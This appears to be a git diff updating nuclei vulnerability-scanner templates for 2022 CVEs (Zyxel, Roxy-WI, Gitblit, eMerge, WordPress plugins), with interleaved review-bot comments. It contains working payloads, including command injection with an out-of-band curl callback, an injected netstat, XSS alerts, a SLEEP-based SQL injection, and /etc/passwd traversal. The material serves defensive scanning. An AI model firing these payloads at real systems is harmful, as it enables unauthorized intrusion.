4a0a0047304502206d4c2cf954be9043250ab16a537e7ef2675f66c8ba097f50d00faccf56e535f5022100921f7c12c1750864df6c558bcfbaf3b6796d0eeba2782990b6e5755840d26fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-30513.yaml b/nuclei-templates/CVE-2022/CVE-2022-30513.yaml
index f2dcf98586..d744e95727 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-30513.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-30513.yaml
@@ -6,35 +6,45 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/bigzooooz/CVE-2022-30513 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-30513 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30513 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.39401 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,xss,authenticated + max-request: 2 + vendor: school_dormitory_management_system_project + product: school_dormitory_management_system + tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project -requests: +http: - raw: - | POST /dms/admin/login.php?f=login HTTP/1.1 Host: {{Hostname}} username={{username}}&password={{password}} - - | GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1 Host: {{Hostname}} - req-condition: true redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word 
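Review bot: The raw block in CVE-2022-30513.yaml loses `cookie-reuse: true` and `req-condition: true` while it still logs in with the first request and sends the authenticated GET as the second, so whether the session cookie now carries over depends on the engine version; the matchers that consume the second response sit outside this hunk. If the templates target nuclei v3, where cookie reuse is the default for raw requests and multi-request conditions are inferred from the matcher DSL, the removal is fine and deserves a comment above `redirects:` such as `# cookie reuse and req-condition are implicit on nuclei v3`; on a v2 engine the second request would go out unauthenticated and the template would silently stop detecting. CVE-2022-30514.yaml makes the identical change and needs the same check.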
@@ -47,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30514.yaml b/nuclei-templates/CVE-2022/CVE-2022-30514.yaml index f736275b13..70cbd9eb9d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30514.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30514.yaml 
@@ -6,36 +6,45 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/bigzooooz/CVE-2022-30514 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30514 - https://nvd.nist.gov/vuln/detail/CVE-2022-30514 + - https://github.com/Marcuccio/kevin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30514 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.39401 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,xss,authenticated + max-request: 2 + vendor: school_dormitory_management_system_project + product: school_dormitory_management_system + tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project -requests: +http: - raw: - | POST /dms/admin/login.php?f=login HTTP/1.1 Host: {{Hostname}} username={{username}}&password={{password}} - - | GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1 Host: {{Hostname}} - req-condition: true redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word 
@@ -48,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 4a0a00473045022100e1cbf9f22134eb78b7d8269338039056f10e9a1d459561bfeb4a4273ceb08d4302203b2f1ddc9b80bac96a44fba68d9c28c248e12ef89a720e1ce2a1921fc0fb9a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml index 4e8a29bb38..f1fe6f3456 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml 
@@ -1,37 +1,24 @@ id: CVE-2022-30525 - info: name: Zyxel Firewall - OS Command Injection author: h1ei1,prajiteshsingh severity: critical description: | An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. - remediation: | - Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. 
reference: - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - https://github.com/rapid7/metasploit-framework/pull/16563 - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 - - http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97482 - epss-percentile: 0.99967 - cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: zyxel - product: usg_flex_100w_firmware shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce - -http: + tags: rce,zyxel,cve,cve2022,firewall,unauth,kev +requests: - raw: - | POST /ztp/cgi-bin/handler HTTP/1.1 @@ -39,15 +26,14 @@ http: Content-Type: application/json {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - - type: status status: - 500 -# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3062.yaml b/nuclei-templates/CVE-2022/CVE-2022-3062.yaml index 7c2de2e73d..f00e70105b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3062.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3062.yaml 
@@ -6,18 +6,21 @@ info: severity: medium description: | The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.4.12 reference: - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a - https://nvd.nist.gov/vuln/detail/CVE-2022-3062 - https://wordpress.org/plugins/simple-file-list/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45913 + epss-score: 0.0012 + epss-percentile: 0.46075 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: simplefilelist product: simple-file-list framework: wordpress - tags: cve,authenticated,wordpress,wp-plugin,wp,wpscan,cve2022,xss,simple-file-list + tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "ee-simple-file-list")' - 'contains(body_2, "onanimationstart=alert(document.domain)//")' condition: and -# digest: 490a0046304402200c8483a6eec6bce3c05ce09a25f4e569fb62d5f5e96565de0eda7e754fe7a49c02207cd555f2a4f74a3d3870df3ef84d5b2c61a184e0de64a474c8dded9ad04d3dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b8058e2d09fded7acc96d56479398cd66ad473245c9a0aedcd58109aade3dc502204b7c40619880f5fc9c9742dedc31da8c5ec37f59fe121a562c11d2884098bb5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml deleted file mode 100644 index c7b81333ed..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-30777 - -info: - name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://en.wikipedia.org/wiki/H-Sphere - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30777 - cwe-id: CWE-79 - metadata: - shodan-query: title:"h-sphere" - verified: "true" - tags: cve,cve2022,parallels,hsphere,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - words: - - '"><script>alert(document.domain)</script>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31126.yaml b/nuclei-templates/CVE-2022/CVE-2022-31126.yaml index 9cf66874d7..b411693f94 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31126.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31126.yaml 
@@ -6,24 +6,32 @@ info: severity: critical description: | Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Users are advised to upgrade to latest version. reference: - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html - https://www.cve.org/CVERecord?id=CVE-2022-31137 - https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9 - https://nvd.nist.gov/vuln/detail/CVE-2022-31137 - https://nvd.nist.gov/vuln/detail/CVE-2022-31126 - remediation: Users are advised to upgrade to latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31126 cwe-id: CWE-74 + epss-score: 0.84229 + epss-percentile: 0.98401 + cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: roxy-wi + product: roxy-wi shodan-query: http.html:"Roxy-WI" - verified: "true" - tags: cve,cve2022,rce,unauth,roxy,packetstorm + tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi -requests: +http: - raw: - | POST /app/options.py HTTP/1.1 @@ -45,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/06 +# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31137.yaml b/nuclei-templates/CVE-2022/CVE-2022-31137.yaml deleted file mode 100644 index 918628b773..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31137.yaml +++ /dev/null 
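Review bot: The reference list under `cve-id: CVE-2022-31126` still carries three CVE-2022-31137 links (cve.org, the GHSA advisory and the NVD entry), and this same commit deletes CVE-2022-31137.yaml, whose request went to the same /app/options.py endpoint. A reader of this file alone cannot tell why the other id is referenced or that coverage for it presumably now lives here; a comment above `reference:` such as `# also covers CVE-2022-31137 (same unauthenticated options.py sink; its separate template was removed)` would keep that traceable. The matchers for this request are outside the hunk.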
@@ -1,34 +0,0 @@ -id: CVE-2022-31137 - -info: - name: Roxy-WI Unauthenticated Remote Code Executions - author: nerrorsec - severity: critical - description: | - Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. - reference: - - https://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html - - https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-31137 - metadata: - shodan-query: http.html:"Roxy-WI" - verified: "true" - tags: cve,cve2022,rce,unauth,roxy,packetstorm - -requests: - - raw: - - | - POST /app/options.py HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bnetstat+-p+%23%23&backend_server=127.0.0.1 - - matchers: - - type: word - condition: and - part: body - words: - - "Local Address" - - "Foreign Address" - - "State" diff --git a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml b/nuclei-templates/CVE-2022/CVE-2022-31268.yaml deleted file mode 100644 index b8148bb605..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml +++ /dev/null 
@@ -1,48 +0,0 @@ -id: CVE-2022-31268 - -info: - name: Gitblit 1.9.3 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). - reference: - - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - - https://vuldb.com/?id.200500 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31268 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Gitblit" - verified: "true" - tags: cve,cve2022,lfi,gitblit - -requests: - - method: GET - path: - - "{{BaseURL}}/resources//../WEB-INF/web.xml" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "</web-app>" - - "java.sun.com" - - "gitblit.properties" - condition: and - - - type: word - part: header - words: - - "application/xml" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31269.yaml b/nuclei-templates/CVE-2022/CVE-2022-31269.yaml index 1bd23f8fd2..5c4f56238d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31269.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31269.yaml 
@@ -6,22 +6,33 @@ info: severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://www.nortekcontrol.com/access-control/ - https://eg.linkedin.com/in/omar-1-hashem - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 + epss-score: 0.00231 + epss-percentile: 0.6049 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: emerge_e3_firmware shodan-query: http.title:"Linear eMerge" - verified: "true" - tags: cve2022,emerge,exposure,packetstorm,cve + tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol -requests: +http: - method: GET path: - "{{BaseURL}}/test.txt" @@ -47,5 +58,4 @@ requests: - type: regex regex: - Password='(.+?)' - -# Enhanced by md on 2023/02/03 +# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31299.yaml b/nuclei-templates/CVE-2022/CVE-2022-31299.yaml index 9350d2e4c8..c2e724eac2 100644 
--- a/nuclei-templates/CVE-2022/CVE-2022-31299.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31299.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/bigzooooz/CVE-2022-31299 - https://angtech.org - https://nvd.nist.gov/vuln/detail/CVE-2022-31299 + - https://angtech.org/product/view/3 + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-31299 cwe-id: CWE-79 + epss-score: 0.00209 + epss-percentile: 0.58245 + cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,haraj,xss + verified: true + max-request: 1 + vendor: angtech + product: haraj + tags: cve,cve2022,haraj,xss,angtech -requests: +http: - method: GET path: - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/22 +# digest: 490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml index 8c1c21231b..c09b86777f 100644 
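Review bot: The context line for the request path reads `&t=1¬e=%3C/textarea%3E...`, where `¬e` is what `&note` becomes after HTML-entity decoding of `&not`; this is not introduced by the commit, but if that is the byte sequence in the file rather than an artifact of how this page was rendered, the payload is sent in a parameter literally named `¬e` and never reaches the form field (presumably `note`) the XSS is reported in, so the template cannot produce a true positive. The line would read `- "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"`. The matchers follow outside this hunk.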
--- a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml @@ -1,11 +1,10 @@ id: CVE-2022-31373 - info: - name: SolarView Compact 6.00 - Cross-Site Scripting + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) author: ritikchaddha severity: medium description: | - SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. reference: - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 @@ -18,28 +17,20 @@ info: shodan-query: http.html:"SolarView Compact" verified: "true" tags: cve,cve2022,xss,solarview - requests: - method: GET path: - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word part: body words: - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' - - 'HREF="Solar_Service.php"' - condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3142.yaml b/nuclei-templates/CVE-2022/CVE-2022-3142.yaml index 5a741267d5..32a47a3e0f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3142.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3142.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3142 cwe-id: CWE-89 - epss-score: 0.00318 - epss-percentile: 0.67196 + epss-score: 0.00356 + epss-percentile: 0.71515 cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -28,7 +28,7 @@ info: product: nex-forms framework: wordpress publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ - tags: wpscan,packetstorm,cve,cve2022,wordpress,sqli,wp-plugin,wp,authenticated + tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: - raw: @@ -40,15 +40,15 @@ http: log={{username}}&pwd={{password}}&wp-submit=Log+In - | @timeout: 30s - GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1 + GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code_2 == 200' - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4b0a00483046022100f45abaef719f4fbab177f410e828732d7e0271752249761df9e80caa8de14bb0022100d6d5181a640dfea40e614a64d7ab03101dead62f821a435f5d3087686ca9b2e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31474.yaml b/nuclei-templates/CVE-2022/CVE-2022-31474.yaml index 5c476e0f02..946199f930 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31474.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31474.yaml 
@@ -5,27 +5,37 @@ info: author: aringo severity: high description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. + remediation: Upgrade to at least version 8.7.5 or higher reference: - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/ - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy - https://ithemes.com/backupbuddy/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474 - remediation: Upgrade to at least version 8.7.5 or higher + - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 - cwe-id: CWE-22 cve-id: CVE-2022-31474 - tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy + cwe-id: CWE-22 + epss-score: 0.0063 + epss-percentile: 0.78579 + cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: ithemes + product: backupbuddy + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes -requests: +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -33,5 +43,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 2022/09/14 +# digest: 4a0a00473045022100ecf44787bd6300f50e4a767ffe601dd4051e6dadfe6cd36dcbb948a853a44dbf02205339443407fd4fb29ff75bd9f6565a7dc2d382e699cca5b76c135da1b219d1cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
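Review bot: The reference added to CVE-2022-31474.yaml, `https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/`, duplicates the existing entry two lines above that differs only by a trailing slash; one of the two should go. The cvss vector is changed from `CVSS:3.0` to `CVSS:3.1` while the score stays 7.5, which is plausible for this vector but worth confirming against the NVD record rather than assuming. The matcher block continues past the hunk.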
diff --git a/nuclei-templates/CVE-2022/CVE-2022-31499.yaml b/nuclei-templates/CVE-2022/CVE-2022-31499.yaml
index ab45c6cd94..b2a74b78ba 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-31499.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-31499.yaml
@@ -1,27 +1,38 @@ id: CVE-2022-31499 info: - name: eMerge E3-Series - Command Injection + name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection author: pikpikcu severity: critical description: | - Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256 . + Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html - https://github.com/omarhashem123/CVE-2022-31499 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31499 - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-31499 + - https://eg.linkedin.com/in/omar-1-hashem classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31499 cwe-id: CWE-78 + epss-score: 0.50608 + epss-percentile: 0.97247 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* 